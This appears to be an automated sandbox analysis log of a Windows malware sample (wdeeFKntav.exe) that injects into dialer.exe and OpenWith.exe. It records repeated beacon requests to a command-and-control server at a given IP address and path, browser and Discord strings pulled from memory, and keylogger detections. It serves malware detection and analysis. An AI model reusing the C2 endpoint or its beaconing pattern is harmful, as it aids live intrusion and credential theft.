Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: TYefaI1F0MWWonG
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: 2ku58F9dUSVrZha
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: kvd5dMCTf5mbuop
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: EbWxOS52DLQr2vF
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: f5cmLiHAmSPq8o0
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: oqscagi87YhXdh9
Source: global traffic HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: IDbbhmNh0FLcLVU
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:27 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:34 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:41 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:47 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:53 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:59 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:06 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:13 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:19 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:25 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:32 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:39 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:45 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:51 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:58 GMTContent-Length: 166Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:17:04 GMTContent-Length: 166Connection: close
Source: dialer.exe, 00000002.00000002.2240294940.00000000026EC000.00000004.00000010.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9
Source: dialer.exe, 00000002.00000002.2241516364.0000000004D2F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9kernelbasentdllkernel32GetProcessMitigationPolicyH
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9x
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49723 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_520ab8aa-e
Installs a raw input device (often for capturing keystrokes)
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_d15392e1-b
Yara detected Keylogger Generic
Source: Yara match File source: 0.3.wdeeFKntav.exe.45c0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.dialer.exe.4fd0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.dialer.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wdeeFKntav.exe.47e0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.dialer.exe.4fd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wdeeFKntav.exe.47e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wdeeFKntav.exe.45c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wdeeFKntav.exe.45c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wdeeFKntav.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dialer.exe PID: 3544, type: MEMORYSTR
Contains functionality to call native functions
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B168230C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, 3_3_0000025B168230C7
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E215AC NtAcceptConnectPort, 3_2_0000025B14E215AC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E20AC8 NtAcceptConnectPort,NtAcceptConnectPort, 3_2_0000025B14E20AC8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E21CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, 3_2_0000025B14E21CD0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 3_2_0000025B14E21A90
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F059F40 NtAcceptConnectPort, 3_2_00007DF41F059F40
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058D94 NtAcceptConnectPort, 3_2_00007DF41F058D94
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058C90 NtAcceptConnectPort, 3_2_00007DF41F058C90
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F059CA0 _calloc_dbg,NtAcceptConnectPort, 3_2_00007DF41F059CA0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058C08 NtAcceptConnectPort, 3_2_00007DF41F058C08
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F059AF4 _malloc_dbg,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, 3_2_00007DF41F059AF4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058AFC NtAcceptConnectPort, 3_2_00007DF41F058AFC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058A40 NtAcceptConnectPort, 3_2_00007DF41F058A40
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F05A600 NtAcceptConnectPort, 3_2_00007DF41F05A600
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F05A540 NtAcceptConnectPort, 3_2_00007DF41F05A540
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F05A2B0 NtAcceptConnectPort, 3_2_00007DF41F05A2B0
Detected potential crypto function
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00CC0AA0 0_2_00CC0AA0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B16825E7C 3_3_0000025B16825E7C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B1682557C 3_3_0000025B1682557C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B168258FC 3_3_0000025B168258FC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B1682279C 3_3_0000025B1682279C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B16821BA6 3_3_0000025B16821BA6
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B16824A38 3_3_0000025B16824A38
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B16822C3C 3_3_0000025B16822C3C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_3_0000025B168224F7 3_3_0000025B168224F7
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E20C5C 3_2_0000025B14E20C5C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F045BD8 3_2_00007DF41F045BD8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04BEC4 3_2_00007DF41F04BEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07CEC4 3_2_00007DF41F07CEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0A6F20 3_2_00007DF41F0A6F20
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F11CF3C 3_2_00007DF41F11CF3C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F113DE0 3_2_00007DF41F113DE0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F089E68 3_2_00007DF41F089E68
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F117CF4 3_2_00007DF41F117CF4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F088BE8 3_2_00007DF41F088BE8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F031BFC 3_2_00007DF41F031BFC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F040C44 3_2_00007DF41F040C44
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F05EC44 3_2_00007DF41F05EC44
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F096B20 3_2_00007DF41F096B20
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F08A9C4 3_2_00007DF41F08A9C4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F096A10 3_2_00007DF41F096A10
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F034A14 3_2_00007DF41F034A14
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F084A14 3_2_00007DF41F084A14
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1158AC 3_2_00007DF41F1158AC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1178D8 3_2_00007DF41F1178D8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07F954 3_2_00007DF41F07F954
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0577A0 3_2_00007DF41F0577A0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0717C4 3_2_00007DF41F0717C4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07C7E8 3_2_00007DF41F07C7E8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F10780C 3_2_00007DF41F10780C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04D850 3_2_00007DF41F04D850
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F096834 3_2_00007DF41F096834
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F087860 3_2_00007DF41F087860
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04D688 3_2_00007DF41F04D688
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0CB68C 3_2_00007DF41F0CB68C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1246F8 3_2_00007DF41F1246F8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F118750 3_2_00007DF41F118750
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F09F4FC 3_2_00007DF41F09F4FC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F088534 3_2_00007DF41F088534
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1173A0 3_2_00007DF41F1173A0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1183B8 3_2_00007DF41F1183B8
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0AA3F4 3_2_00007DF41F0AA3F4
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F03E414 3_2_00007DF41F03E414
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07C45C 3_2_00007DF41F07C45C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F067318 3_2_00007DF41F067318
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F043314 3_2_00007DF41F043314
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1241DC 3_2_00007DF41F1241DC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F1111BC 3_2_00007DF41F1111BC
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F07D210 3_2_00007DF41F07D210
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F118238 3_2_00007DF41F118238
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0D40A0 3_2_00007DF41F0D40A0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F09B094 3_2_00007DF41F09B094
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F096F78 3_2_00007DF41F096F78
